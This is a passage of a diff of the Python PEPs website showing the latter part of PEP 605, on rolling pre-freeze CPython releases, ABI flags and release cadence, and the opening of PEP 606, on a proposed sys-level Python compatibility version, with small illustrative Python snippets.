This is due to the fact that the extension module may be relying on provisional +or previously deprecated interfaces that were changed or removed in a later +alpha or beta release, or it may be due to public structures used by the +extension module changing size due to the addition of new fields.

+

Historically, adoption of alpha and beta releases has been low enough that this +hasn’t really been a problem in practice. However, this PEP proposes to actively +encourage widespread operational use of beta releases, which makes it desirable +to ensure that users of those releases won’t inadvertently publish binary +extension modules that cause segfaults for users running the release candidates +and final releases.

+

To that end, this PEP proposes amending the extension module SOABI marker +on non-Windows systems to include a new “p” flag for CPython pre-releases, and +only switch back to omitting that flag once the ABI for that particular X.Y.0 +version has been frozen on entry to the release candidate stage.

+

With this change, alpha and beta releases of 3.9.0 would get an SOABI tag of cpython-39p, while all release candidates and final builds (for both 3.9.0 and later 3.9.x releases) would get an unqualified SOABI tag of cpython-39.

+

Debug builds would still add the “d” to the end of the tag, giving +cpython-39pd for debug builds of pre-releases.

+

On Windows systems, the suffix for tagged pyd files in pre-release builds +would include “p” as a pre-release marker immediately after the version number, +giving markers like “cp39p-win_amd64”.

+

A proposed reference implementation for this change is available at [4] (Note: +at time of writing, that implementation had not yet been tested on Windows).

+
+
+
+

Updating Python-Requires for projects affected by full C ABI changes

+

When a project first opts in to providing pre-built binary wheels for the +rolling pre-freeze release series, they don’t need to do anything special: they +would add the rolling release series to their build and test matrices and +publish binary archives that are flagged as being compatible with that release +series, just as they would if providing pre-built binary wheels after the +full CPython ABI freeze for that release series.

+

However, if the project is affected by a CPython ABI compatibility break in the +rolling release stream, then they will need to issue a version update that +includes both the new binary build, and a new environment constrained +Python-Requires marker.

+

For example, if a project supporting the rolling release stream was affected by +a CPython ABI compatibility break in the 3.9.0a5 release, then they would add +the following metadata entry on the version that published the updated binary +build:

+
Python-Requires: >= "3.9.0b6"; python_version == "3.9" and full_python_version != "3.9.0a5"
+
+
+

What this does is add an additional compatibility constraint as part of the +published packages, so Python 3.9.0 beta versions prior to 3.9.0b6 won’t +consider the updated package as a candidate for installation, and the only +alpha release that will consider the package is 3.9.0a5 itself.

+
+
+
+

Caveats and Limitations

+

Actual release dates may be scheduled up to a month earlier or later at +the discretion of the release manager, based on release team availability, and +the timing of other events (e.g. PyCon US, or the annual core developer +sprints). However, as one goal of the proposal is to provide a consistent +release cadence, adjustments should ideally be rare.

+

Within a release series, the exact frequency of maintenance releases would +still be up to the release manager and the binary release team; this PEP +only proposes an expected cadence for pre-releases and X.Y.0 releases.

+

However, for the sake of the example timelines, the PEP assumes maintenance +releases every other month, allowing them to alternate months with the rolling +pre-freeze releases.

+

The release manager and Steering Council would also retain the power to amend +various details of the proposal in this PEP. Possible amendments include (but +are not limited to):

+
    +
  • changing the timing for creation of the maintenance branch. If a major change +that would require a new alpha release is landed relatively late in the +pre-release process, the release manager could potentially choose to branch +off from a point prior to that major change. For example, it may make sense to +do this if the next scheduled release was intended to be the final beta +release or the first release candidate.
  • +
  • the criteria for declaring an alpha release could potentially be expanded to +include all changes that require a “Porting” entry in the What’s New document
  • +
  • rather than declaring alpha releases on an as-needed basis, the release +manager could declare some dates as alpha releases in advance, and ask core +developers to time their higher risk changes accordingly.
  • +
+

The intent of the concrete proposal in the PEP is to provide a clear +illustrative example for reviewers to consider, not to constrain our ability +to adjust specific details based on practical experience with the process.

+
+
+

Design Discussion

+
+

Why rolling pre-freeze releases over simply doing more frequent X.Y.0 releases?

+

For large parts of Python’s user base, availability of new CPython feature +releases isn’t the limiting factor on their adoption of those new releases +(this effect is visible in such metrics as PyPI download metadata).

+

As such, any proposal based on speeding up full feature releases needs to strike +a balance between meeting the needs of users who would be adopting each release +as it became available, and those that would now be in a position of adopting +every 2nd, 3rd, or 4th release, rather than being able to migrate to almost +every release at some point within its lifecycle.

+

This proposal aims to approach the problem from a different angle by defining a +new production-ready release stream that is more specifically tailored to the +interests of operating environments that are able to consume new releases as +fast as the CPython core team is prepared to produce them.

+
+
+

Is it necessary to keep the “alpha” and “beta” naming scheme?

+

Using the “a” and “b” initials for the proposed rolling releases is a design +constraint imposed by some of the pragmatic aspects of the way CPython version +numbers are published.

+

Specifically, alpha releases, beta releases, and release candidates are reported +in some places using the strings “a”, “b”, and “c” respectively, while in others +they’re reported using the hex digits 0xA, 0xB, and 0xC. We want to +preserve that, while also ensuring that any Python-Requires constraints +are expressed against the beta releases rather than the alpha releases (since +the latter may not enforce the abi3 stability requirements if two alpha +releases occur in succession).
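Both representations are visible at runtime; for example, on a 3.9.0b1 interpreter (the values in the comments are what that interpreter would report):

import sys

print(sys.version_info)     # sys.version_info(major=3, minor=9, micro=0, releaselevel='beta', serial=1)
print(hex(sys.hexversion))  # 0x30900b1 -- the 0xB nibble marks a beta release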

+

However, there isn’t anything forcing us to say that the “a” stands for “alpha” +or the “b” stands for “beta”.

+

That means that if we wanted to increase adoption amongst folks that were +only being put off by the “beta” label, then it may make sense to emphasise +the “*A*BI breaking” and “*B*inary compatible” names over the “alpha” +and “beta” names, giving:

+
    +
  • 3.9.0a1: ABI breaking pre-freeze release
  • +
  • 3.9.0b2: binary compatible pre-freeze release
  • +
  • 3.9.0rc1: release candidate
  • +
  • 3.9.0: final release
  • +
+

This iteration of the PEP doesn’t go that far, as limiting initial adoption +of the rolling pre-freeze releases to folks that are comfortable with the +“beta” label is likely to be a good thing, as it is the early adopters of these +releases that are going to encounter any unexpected consequences that occur +at the level of the wider Python ecosystem, and we’re going to need them to +be willing to take an active part in getting those issues resolved.

+

Moving away from the “beta” naming would then become an option to keep in mind +for the future, assuming the resulting experience is sufficiently positive that +we decide the approach is worth continuing.

+
+
+

Why rolling pre-freeze releases rather than alternating between stable and unstable release series?

+

Rather than using the beta period for rolling releases, another option would be +to alternate between traditional stable releases (for 3.8.x, 3.10.x, etc), and +release series that used the new rolling release cadence (for 3.9.x, 3.11.x, +etc).

+

This idea suffers from the same core problem as PEP 598 and PEP 602: it imposes +changes on end users that are happy with the status quo without offering them +any clear compensating benefit.

+

It’s also affected by one of the main concerns raised against PEP 598: at least +some core developers and end users strongly prefer that no particular semantics +be assigned to the value of any of the numbers in a release version. These +community members instead prefer that all the semantic significance be +associated with the position within the release number that is changing.

+

By contrast, the rolling pre-freeze release proposal aims to address that concern +by ensuring that the proposed changes in policy all revolve around whether a +particular release is an alpha release, beta release, release candidate, or +final release.

+
+
+

Why not use Calendar Versioning for the rolling release stream?

+

Steve Dower’s initial write-up of this proposal [1] suggested the use of +calendar versioning for the rolling release stream (so the first rolling +pre-release after Python 3.8.0 would have been Python 2019.12 rather than +3.9.0b1).

+

Paul Moore pointed out [2] two major practical problems with that proposal:

+
    +
  • it isn’t going to be clear to users of the calendar-based versions where they +stand in relation to the traditionally numbered versions
  • +
  • it breaks Python-Requires metadata processing in packaging tools with +no clear way of fixing it reliably (since all calendar versions would appear +as newer than any standard version)
  • +
+

This PEP aims to address both of those problems by using the established beta +version numbers for the rolling releases.

+

As an example, consider the following question: “Does Python 2021.12 include +all the new features released in Python 3.9.0?”. With calendar versioning on +the rolling releases, that’s impossible to answer without consulting a release +calendar to see when 3.9.0rc1 was branched off from the rolling release series.

+

By contrast, the equivalent question for rolling pre-freeze releases is +straightforward to answer: “Does Python 3.10.0b2 include all the new features +released in Python 3.9.0?”. Just from formulating the question, the answer is +clearly “Yes, unless they were provisional features that got removed”.

+

The beta numbering approach also avoids other questions raised by the calendar +versioning concept, such as how sys.version_info, PY_VERSION_HEX, +site-packages directory naming, and installed Python binary and extension +module naming would work.

+
+
+

How would users of the rolling pre-freeze releases detect API changes?

+

When adding new features, core developers would be strongly encouraged to +support feature detection and graceful fallback to alternative approaches via +mechanisms that don’t rely on either sys.version_info or runtime code object +introspection.

+

In most cases, a simple hasattr check on the affected module will serve this +purpose, but when it doesn’t, alternative approaches would be considered as part +of the feature addition. Prior art in this area includes the +pickle.HIGHEST_PROTOCOL attribute, the hashlib.algorithms_available set, +and the various os.supports_* sets that the os module already offers for +platform dependent capability detection.
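A minimal sketch of that style of feature detection, using math.dist() (added in Python 3.8) as the example, with a hypothetical local fallback:

import math

if hasattr(math, "dist"):
    distance = math.dist
else:
    # Hypothetical fallback for interpreters without math.dist()
    def distance(p, q):
        return math.sqrt(sum((a - b) ** 2 for a, b in zip(p, q)))

print(distance((0, 0), (3, 4)))  # 5.0 either way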

+

It would also be possible to add features that need to be explicitly enabled +via a __future__ import when first included in the rolling pre-freeze releases, +even if that feature flag was subsequently enabled by default before its first +appearance in an X.Y.0 release candidate.

+

The rationale behind these approaches is that explicit detection/enabling like this would make it straightforward for users of the rolling pre-freeze release stream to notice when we remove or change provisional features (e.g. from __future__ imports fail at compile time if the feature flag no longer exists), or to safely fall back on previous functionality.
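For example, an unknown feature flag is rejected when the module is compiled, so the breakage is immediate and easy to diagnose (no_such_feature is a deliberately invalid name):

try:
    compile("from __future__ import no_such_feature", "<demo>", "exec")
except SyntaxError as exc:
    print("feature flag removed:", exc)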

+

The interpreter’s rich attribute lookup machinery means we can also choose to +add warnings for provisional or deprecated imports and attributes that we don’t +have any practical way to add for checks against the value of +sys.version_info.

+
+
+

Why add a new pre-freeze ABI flag to force rebuilds after X.Y.0rc1?

+

The core development team currently actively discourage the creation of +public pre-built binaries for an X.Y series prior to the ABI freeze date.

+

The reason we do that is to avoid the risk of painful debugging sessions +on the stable X.Y.0 release that get traced back to “Oh, our dependency +‘superfast-binary-operation’ was affected by a CPython ABI break in +X.Y.0a3, but the project hasn’t published a new build since then”.

+

With the proposed pre-freeze ABI flag in place, this aspect of the +release adoption process continues on essentially unchanged from the +status quo: a new CPython X.Y release series hits ABI freeze -> package +maintainers publish new binary extension modules for that release +series -> end users only get segfaults due to actual bugs, not just +builds against an incompatible ABI.

+

The primary goal of the new pre-freeze ABI flag is then to improve +the user experience of the rolling pre-freeze releases themselves, by +allowing pre-built binary archives to be published for those releases +without risking the problems that currently cause us to actively +discourage the publication of binary artifacts prior to ABI freeze.

+

In the ideal case, package maintainers will only need to publish +one pre-freeze binary build at X.Y.0a1, and then a post-freeze +build after X.Y.0rc1. The only situations that should require +a rebuild in the meantime are those where the project was +actually affected by a CPython ABI break in an intervening alpha +release.

+

As a concrete example, consider the scenario where we end up having three +releases that include ABI breaks: X.Y.0a1, X.Y.0a5, X.Y.0a7. The X.Y.0a7 ABI is +then the ABI that carries through all the subsequent beta releases and into +X.Y.0rc1. (This is the scenario illustrated in figure 1)

+

Forcing everyone to rebuild the world every time there’s an alpha release in +the rolling release stream would almost certainly lead to publishers deciding +supporting the rolling releases was more trouble than it was worth, so we want +to allow modules built against X.Y.0a1 to be loaded against X.Y.0a7, as they’re +probably going to be compatible (there are very few projects that use every +C API that CPython publishes, and most ABI breaks affect a single specific API).

+

Once we publish X.Y.0rc1 though, we want to ensure that any binaries that were +built against X.Y.0a1 and X.Y.0a4 are completely removed from the end user +experience. It would be nice to be able to keep the builds against X.Y.0a7 and +any subsequent beta releases (since it turned out those actually were built +against the post-freeze ABI, even if we didn’t know that at the time), but +losing them isn’t any worse than the status quo.

+

This means that the pre-freeze flag is “the simplest thing that could possibly +work” to solve this problem - it’s just a new ABI flag, and we already have +the tools available to deal with ABI flags (both in the interpreter and in +package publication and installation tools).
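The existing machinery is visible from Python today; note that the pre-freeze flag value in the final comment is hypothetical, since this PEP was never implemented:

import sys
import sysconfig

print(getattr(sys, "abiflags", ""))            # e.g. '' or 'd' on POSIX builds
print(sysconfig.get_config_var("EXT_SUFFIX"))  # e.g. '.cpython-39-x86_64-linux-gnu.so'
# A pre-freeze build might instead report something like
# '.cpython-39p-x86_64-linux-gnu.so' until the post-X.Y.0rc1 rebuild.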

+

Since the ABI flags have changed relative to the pre-releases, projects don’t +even need to publish a new release: they can upload new wheel archives to their +existing releases, just as they can today.

+

A cleverer scheme that was able to retroactively accept everything built +against the last alpha or subsequent beta releases would likely be possible, +but it isn’t considered necessary for adoption of this PEP, as even if we +initially start out with a simple pre-release ABI flag, it would still be +possible to devise a more sophisticated approach in the future.

+
+
+

Why allow additional alpha releases after X.Y.0a1?

+

In an ideal world, all breaking changes to the full CPython ABI would land in +X.Y.0a1 alongside the filesystem layout changes, and the ABI for the release +series would remain stable after that.

+

However, recent history doesn’t suggest that we’d be able to actually make that +commitment and stick to it, so the PEP assumes that ABI changes will be made +progressively throughout the pre-freeze period, and the full lockdown will occur +only with the creation of the X.Y.z maintenance branch when preparing X.Y.0rc1.

+
+
+

Implications for CPython core development

+

The major change for CPython core development is the need to keep the master +branch more consistently release ready.

+

While the main requirement for that would be to keep the stable BuildBot fleet +green, there would also be encouragement to keep the development version of +the documentation up to date for the benefit of users of the rolling pre-freeze +releases. This will include providing draft What’s New entries for changes as +they are implemented, although the initial versions may be relatively sparse, +and then expanded based on feedback from beta release users.

+

For core developers working on the CPython C API, there would also be a new +requirement to consistently mark ABI breaking changes in their NEWS file +snippets.

+

On the specific topic of the stable ABI, most API designs will be able to go +through a process where they’re first introduced as a provisional part of the +full CPython API (allowing changes between pre-freeze releases), and only +promoted to the stable ABI once developers are confident that the interface +is genuinely stable.

+

It’s only in rare cases where an API serves no useful purpose outside the +stable ABI that it may make sense to publish an alpha release containing a +provisional stable ABI addition rather than iterating on the design in the +provisional CPython API instead.

+
+
+

Implications for Python library development

+

If this PEP is successful in its aims, then supporting the rolling pre-freeze release stream shouldn’t be substantially more painful for library authors than supporting the stable releases.

+

For publishers of pure Python packages, this would be a matter of publishing +“py3” tagged wheel archives, and potentially adding the rolling pre-freeze +release stream to their test matrix if that option is available to them.

+

For publishers of binary extension modules, the preferred option would be to +target the stable C ABI (if feasible), and thus enjoy an experience similar to +that of pure Python packages, where a single pre-built wheel archive is able to +cover multiple versions of Python, including the rolling pre-freeze release +stream.

+

This option isn’t going to be viable for all libraries, and the desired outcome +for those authors is that they be able to support the rolling releases by +building and publishing one additional wheel archive, built against the initial +X.Y.0a1 release. The subsequent build against X.Y.0rc1 or later is then the same +build that would have been needed if only supporting the final stable release.

+

Additional wheel builds beyond those two should then only be needed if that +particular library is directly affected by an ABI break in any other alpha +release that occurs between those two points.

+

Having a rolling pre-freeze release stream available may also make it more feasible +for more CI providers to offer a “CPython beta release” testing option. At the +moment, this feature is only available from CI providers that are willing and +able to put the necessary time and effort into creating, testing, and publishing +their own builds from the CPython master branch (e.g. [6]).

+
+
+

Implications for the proposed Scientific Python ecosystem support period

+

Based on discussions at SciPy 2019, NEP (NumPy Enhancement Proposal) 29 has +been drafted [3] to propose a common convention across the Scientific Python +ecosystem for dropping support for older Python versions.

+

While the exact formulation of that policy is still being discussed, the draft +proposal (as of October 20, 2019) recommends that projects support any Python +feature release published within the last 42 months, with a minimum of +supporting the latest 2 Python feature releases.

+

For an 18-month feature release cadence, that works out to always supporting at +least the two most recent feature releases, and then dropping support for all +X.Y.Z releases around 6 months after X.(Y+2).0 is released. This means there is +a 6-month period roughly every other year where the three most recent feature +releases are supported.

+

For a 12-month release cadence, it would work out to always supporting at +least the three most recent feature releases, and then dropping support for all +X.Y.Z releases around 6 months after X.(Y+3).0 is released. This means that +for half of each year, the four most recent feature releases would be supported, +with the other half of each year hopefully being used to get ready for that +year’s feature release.

+

For a 24-month release cadence, the second clause takes priority over the first, +and the recommended Python version support period increases to 48 months from +the initial X.Y.0 release in order to consistently support the two most recent +CPython feature releases. For projects that also support the rolling release +stream, the number of supported feature releases would increase to three.
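A back-of-the-envelope check of that arithmetic (assuming, as a simplification, perfectly regular releases at exact month multiples):

def releases_in_window(month, cadence, window=42):
    # Count feature releases whose age at `month` is under NEP 29's window.
    return sum(1 for r in range(0, month + 1, cadence) if month - r < window)

for cadence in (12, 18, 24):
    counts = {releases_in_window(m, cadence) for m in range(100, 200)}
    print(f"{cadence}-month cadence: {sorted(counts)} releases in the window")
# 12-month: [3, 4]; 18-month: [2, 3]; 24-month: [1, 2] -- which is why
# the "latest two releases" minimum dominates for a 24-month cadence.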

+
+
+

Release cycle alignment for core development sprints

+

With the proposal in this PEP, it is expected that the focus of core +development sprints would shift slightly based on the current location +in the two-year cycle.

+

In release years, the timing of PyCon US is suitable for new contributors to +work on bug fixes and smaller features before the first release candidate goes +out, while the Language Summit and core developer discussions can focus on +plans for the next release series.

+

The pre-alpha core development sprint in release years will provide an +opportunity to incorporate feedback received on the previous release, either +as part of the next maintenance release (for bug fixes and feedback on +provisional APIs), or as part of the first alpha release of the next release +series (for feedback received on stable APIs).

+

Those initial alpha releases would also be the preferred target for ABI breaking +changes to the full CPython ABI (while changes later in the release cycle +would still be permitted as described in this PEP, landing them in the X.Y.0a1 +release means that they won’t trigger any additional work for publishers of +pre-built binary packages).

+

The Steering Council elections for the next release cycle are also likely to +occur around the same time as the pre-alpha development sprints.

+

In non-release years, the focus for both events would just be on the upcoming +maintenance and pre-freeze releases. These less intense years would hopefully +provide an opportunity to tackle various process changes and infrastructure +upgrades without impacting the release candidate preparation process.

+
+
+

Release cycle alignment for prominent Linux distributions

+

Some rolling release Linux distributions (e.g. Arch, Gentoo) may be in a +position to consume the new rolling pre-freeze releases proposed in this PEP, +but it is expected that most distributions would continue to use the established +releases.

+

The specific dates for final releases proposed in this PEP are chosen to align +with the feature freeze schedules for the annual October releases of the Ubuntu +and Fedora Linux distributions.

+

For both Fedora and Ubuntu, it means that the release candidate phase aligns +with the development period for a distro release, which is the ideal time for +them to test a new version and provide feedback on potential regressions and +compatibility concerns.

+

For Ubuntu, this also means that their April LTS releases will have benefited +from a full short-term release cycle using the new system Python version, while +still having that CPython release be open to upstream bug fixes for most of the +time until the next Ubuntu LTS release.

+

The one Linux release cycle alignment that is likely to be consistently poor +with the specific proposal in this PEP is with Debian, as that has been released +in the first half of odd-numbered years since 2005 (roughly 12 months offset +from Ubuntu LTS releases).

+

With the annual release proposal in PEP 602, both Debian and Ubuntu LTS would +consistently get a system Python version that is around 6 months old, but +would also consistently select different Python versions from each other.

+

With a two-year cadence, and CPython releases in the latter half of the year, +they’re likely to select the same version as each other, but one of them will +be choosing a CPython release that is more than 18 months behind the latest beta +releases by the time the Linux distribution ships.

+

If that situation does occur, and is deemed undesirable (but not sufficiently +undesirable for Debian to choose to adjust their release timing), then that’s +where the additional complexity of the “incremental feature release” proposal +in PEP 598 may prove worthwhile.

+

(Moving CPython releases to the same half of the year as the Debian and Ubuntu +LTS releases would potentially help mitigate the problem, but also creates +new problems where a slip in the CPython release schedule could directly affect +the release schedule for a Linux distribution, or else result in a distribution +shipping a Python version that is more than 18 months old)

+
+
+

Implications for simple deployment environments

+

For the purposes of this PEP, a “simple” deployment environment is any use case +where it is straightforward to ensure that all target environments are updated +to a new Python release at the same time (or at least in advance of the rollout +of new higher level application versions), and any pre-release testing that +occurs need only target a single Python micro version.

+

The simplest such case would be scripting for personal use, where the testing +and target environments are the exact same environment.

+

Similarly simple environments would be containerised web services, where the +same Python container is used in the CI pipeline as is used on deployment, and +any application that bundles its own Python runtime, rather than relying on a +pre-existing Python deployment on the target system.

+

For these use cases, there is a straightforward mechanism to minimise the +impact of this PEP: continue using the stable releases, and ignore the rolling +pre-freeze releases.

+

To actually adopt the rolling pre-freeze releases in these environments, the +main challenge will be handling the potential for extension module segfaults +when the next pre-freeze release is an alpha release rather than a beta +release, indicating that the CPython ABI may have changed in an incompatible +way.

+

If all extension modules in use target the stable ABI, then there’s no problem, +and everything will work just as smoothly as it does on the stable releases.

+

Alternatively, “rebuild and recache all extension modules” could become a +standard activity undertaken as part of updating to an alpha release.

+

Finally, it would also be reasonable to just not worry about it until something +actually breaks, and then handle it like any other library compatibility issue +found in a new alpha or beta release.

+

Aside from extension module ABI compatibility, the other main point of additional +complexity when using the rolling pre-freeze releases would be “roll-back” +compatibility for independently versioned features, such as pickle and SQLite, +where use of new or provisional features in the beta stream may create files +that are not readable by the stable release. Applications that use these +kinds of features and also require the ability to reliably roll-back to a +previous stable CPython release would, as today, be advised to avoid adopting +pre-release versions.
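For the pickle case specifically, one partial mitigation (a suggestion here, not part of the proposal) is to pin the protocol rather than relying on the default; protocol 4 has been supported since Python 3.4:

import pickle

data = {"answer": 42}
# Pinning the protocol keeps payloads written on a newer (pre-)release
# readable by the older stable release you may need to roll back to.
payload = pickle.dumps(data, protocol=4)
assert pickle.loads(payload) == data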

+
+
+

Implications for complex deployment environments

+

For the purposes of this PEP, “complex” deployment environments are use cases +which don’t meet the “simple deployment” criteria above. They may involve +multiple distinct versions of Python, use of a personalised build of Python, +or “gatekeepers” who are required to approve use of a new version prior to +deployment.

+

For example, organisations that install Python on their users’ machines as part +of a standard operating environment fall into this category, as do those that +provide a standard build environment. Distributions such as conda-forge or +WinPython that provide collections of consistently built and verified packages +are impacted in similar ways.

+

These organisations tend to either prefer high stability (for example, all of +those who are happily using the system Python in a stable Linux distribution +like Debian, RHEL/CentOS, or Ubuntu LTS as their preferred Python environment) +or fast turnaround (for example, those who regularly contribute toward the +latest CPython pre-releases).

+

In some cases, both usage models may exist within the same organisation for +different purposes, such as:

+
    +
  • using a stable Python environment for mission critical systems, but allowing +data scientists to use the latest available version for ad hoc data analysis
  • +
  • a hardware manufacturer deploying a stable Python version as part of their +production firmware, but using the latest available version in the development +and execution of their automated integration tests
  • +
+

Under any release model, each new release of Python generates work for these +organisations. This work may involve legal, security or technical reviews of +Python itself, assessment and verification of impactful changes, reapplication +of patches, recompilation and testing of third-party dependencies, and +only then deployment.

+

Organisations that can take updates quickly should be able to make use of the +more frequent beta releases. While each update will still require similar +investigative work to what they require today, the volume of work required per +release should be reduced as each release will be more similar to the previous +than it is under the present model. One advantage of the proposed +release-every-2-months model is that organisations can choose their own adoption +cadence from adopting every beta release, to adopting one per quarter, or one +every 6 months, or one every year. Beyond that, it would likely make more sense +to continue using the stable releases instead.

+

For organisations with stricter evaluations or a preference for stability, the +longer release cycle for stable releases will reduce the annual effort required +to update, the longer release candidate period will allow more time to do +internal testing before the X.Y.0 release, and the greater use by others +during the beta period will provide more confidence in the initial releases. +Meanwhile, the organisation can confidently upgrade through maintenance +releases for a longer time without fear of breaking changes.

+
+
+
+

Acknowledgements

+

Thanks to Łukasz Langa for creating PEP 602 and prompting this discussion of +possible improvements to the CPython release cadence, and to Kyle Stanley +and h-vetinari for constructive feedback on the initial draft of this PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0605.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
diff --git a/pep-0606/index.html b/pep-0606/index.html new file mode 100644 index 00000000000..bdc5268fc06 --- /dev/null +++ b/pep-0606/index.html @@ -0,0 +1,694 @@
+
+


+ + +
+
+
+

PEP 606 – Python Compatibility Version

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Oct-2019
+
Python-Version:
+
3.9
+
+
+
+
+
+

Abstract

+

Add sys.set_python_compat_version(version) to enable partial +compatibility with requested Python version. Add +sys.get_python_compat_version().

+

Modify a few functions in the standard library to implement partial +compatibility with Python 3.8.

+

Add sys.set_python_min_compat_version(version) to deny backward +compatibility with Python versions older than version.

+

Add -X compat_version=VERSION and -X min_compat_version=VERSION +command line options. Add PYTHONCOMPATVERSION and +PYTHONCOMPATMINVERSION environment variables.

+
+
+

Rationale

+
+

The need to evolve frequently

+

To remain relevant and useful, Python has to evolve frequently; some enhancements require incompatible changes. Any incompatible change can break an unknown number of Python projects, and developers may decide not to implement a feature because of that risk.

+

Users want to get the latest Python version to obtain new features and +better performance. A few incompatible changes can prevent them from using their +applications on the latest Python version.

+

This PEP proposes to add partial compatibility with old Python versions as a tradeoff to fit both use cases.

+

The main issue with the migration from Python 2 to Python 3 is not that +Python 3 is backward incompatible, but how incompatible changes were +introduced.

+
+
+

Partial compatibility to minimize the Python maintenance burden

+

While technically it would be possible to provide full compatibility +with old Python versions, this PEP proposes to minimize the number of +functions handling backward compatibility to reduce the maintenance +burden of the Python project (CPython).

+

Each change introducing backward compatibility to a function should be properly discussed to estimate its long-term maintenance cost.

+

Backward compatibility code will be dropped on each Python release, on a +case-by-case basis. Each compatibility function can be supported for a +different number of Python releases depending on its maintenance cost +and the estimated risk (number of broken projects) if it’s removed.

+

The maintenance cost does not only come from the code implementing the +backward compatibility, but also comes from the additional tests.

+
+
+

Cases excluded from backward compatibility

+

The performance overhead of any compatibility code must be low when +sys.set_python_compat_version() is not called.

+

The C API is out of the scope of this PEP: Py_LIMITED_API macro and +the stable ABI are solving this problem differently, see the PEP 384: +Defining a Stable ABI.

+

Security fixes which break backward compatibility on purpose will not get a compatibility layer; security matters more than compatibility. For example, http.client.HTTPSConnection was modified in Python 3.4.3 to perform all the necessary certificate and hostname checks by default. It was a deliberate change motivated by PEP 476: Enabling certificate verification by default for stdlib http clients (bpo-22417).

+

The Python language does not provide backward compatibility.

+

Changes which are not clearly incompatible are not covered by this PEP. For example, Python 3.9 changed the default protocol in the pickle module to Protocol 4, which was first introduced in Python 3.4. This change is backward compatible up to Python 3.4, so there is no need to fall back to Protocol 3 when compatibility with Python 3.8 is requested.

+

The new DeprecationWarning and PendingDeprecationWarning warnings in Python 3.9 will not be disabled in Python 3.8 compatibility mode. If a project runs its test suite using -Werror (treat any warning as an error), these warnings must be fixed, or specific deprecation warnings must be ignored on a case-by-case basis.

+
+
+

Upgrading a project to a newer Python

+

Without backward compatibility, all incompatible changes must be fixed +at once, which can be a blocker issue. It is even worse when a project +is upgraded to a newer Python which is separated by multiple releases +from the old Python.

+

Postponing an upgrade only makes things worse: each skipped release adds +more incompatible changes. The technical debt only steadily +increases over time.

+

With backward compatibility, it becomes possible to upgrade Python +incrementally in a project, without having to fix all of the issues at once.

+

The “all-or-nothing” approach is a showstopper for porting large Python 2 code bases to Python 3. The list of incompatible changes between Python 2 and Python 3 is long, and it’s getting longer with each Python 3.x release.

+
+
+

Cleaning up Python and DeprecationWarning

+

One of the mottos of the Zen of Python (PEP 20) is:

+
+
There should be one– and preferably only one –obvious way to do +it.
+

When Python evolves, new ways inevitably emerge. DeprecationWarnings are emitted to suggest using the new way, but many developers ignore these warnings, which are silent by default (except in the __main__ module: see PEP 565). Some developers simply ignore all warnings when there are too many of them, and so only deal with the breakage once the deprecated code is actually removed.

+

Sometimes, supporting both ways has a minor maintenance cost, but +developers prefer to drop the old way to clean up their code. These kinds of +changes are backward incompatible.

+

Some developers can take the end of the Python 2 support as an +opportunity to push even more incompatible changes than usual.

+

Adding opt-in backward compatibility prevents applications from breaking and allows developers to continue doing these cleanups.

+
+
+

Redistribute the maintenance burden

+

Backward compatibility involves the authors of incompatible changes more directly in the upgrade path.

+
+
+
+

Examples of backward compatibility

+
+

collections ABC aliases

+

collections.abc aliases to ABC classes have been removed from the +collections module in Python 3.9, after being deprecated since +Python 3.3. For example, collections.Mapping no longer exists.

+

In Python 3.6, aliases were created in collections/__init__.py by +from _collections_abc import *.

+

In Python 3.7, a __getattr__() has been added to the collections +module to emit a DeprecationWarning upon first access to an +attribute:

+
def __getattr__(name):
+    # For backwards compatibility, continue to make the collections ABCs
+    # through Python 3.6 available through the collections module.
+    # Note: no new collections ABCs were added in Python 3.7
+    if name in _collections_abc.__all__:
+        obj = getattr(_collections_abc, name)
+        import warnings
+        warnings.warn("Using or importing the ABCs from 'collections' instead "
+                      "of from 'collections.abc' is deprecated since Python 3.3, "
+                      "and in 3.9 it will be removed.",
+                      DeprecationWarning, stacklevel=2)
+        globals()[name] = obj
+        return obj
+    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
+
+
+

Compatibility with Python 3.8 can be restored in Python 3.9 by adding +back the __getattr__() function, but only when backward +compatibility is requested:

+
def __getattr__(name):
+    if (sys.get_python_compat_version() < (3, 9)
+       and name in _collections_abc.__all__):
+        ...
+    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
+
+
+
+
+

Deprecated open() “U” mode

+

The "U" mode of open() is deprecated since Python 3.4 and emits a +DeprecationWarning. bpo-37330 proposes to drop this mode: +open(filename, "rU") would raise an exception.

+

This change falls into the “cleanup” category: it is not required to +implement a feature.

+

A backward compatibility mode would be trivial to implement and would be +welcomed by users.
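The current behaviour is easy to demonstrate; note that the result is version dependent (a DeprecationWarning on Python 3.4-3.10, while the mode was eventually removed in Python 3.11, after this PEP was written):

import tempfile
import warnings

with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
    f.write("line\n")

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    try:
        open(f.name, "rU").close()
    except ValueError:
        print("'U' mode has already been removed on this interpreter")

if caught:
    print(caught[0].category.__name__)  # DeprecationWarning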

+
+
+
+

Specification

+
+

sys functions

+

Add 3 functions to the sys module:

+
    +
  • sys.set_python_compat_version(version): set the Python +compatibility version. If it has been called previously, use the +minimum of requested versions. Raise an exception if +sys.set_python_min_compat_version(min_version) has been called and +version < min_version. +version must be greater than or equal to (3, 0).
  • +
  • sys.set_python_min_compat_version(min_version): set the +minimum compatibility version. Raise an exception if +sys.set_python_compat_version(old_version) has been called +previously and old_version < min_version. +min_version must be greater than or equal to (3, 0).
  • +
  • sys.get_python_compat_version(): get the Python compatibility +version. Return a tuple of 3 integers.
  • +
+

A version must be a tuple of 2 or 3 integers; a (major, minor) version is equivalent to (major, minor, 0).

+

By default, sys.get_python_compat_version() returns the current +Python version.

+

For example, to request compatibility with Python 3.8.0:

+
import collections
+
+sys.set_python_compat_version((3, 8))
+
+# collections.Mapping alias, removed from Python 3.9, is available
+# again, even if collections has been imported before calling
+# set_python_compat_version().
+parent = collections.Mapping
+
+
+

Obviously, calling sys.set_python_compat_version(version) has no effect on code executed before the call. Use the -X compat_version=VERSION command line option or the PYTHONCOMPATVERSION=VERSION environment variable to set the compatibility version at Python startup.

+
+
+

Command line

+

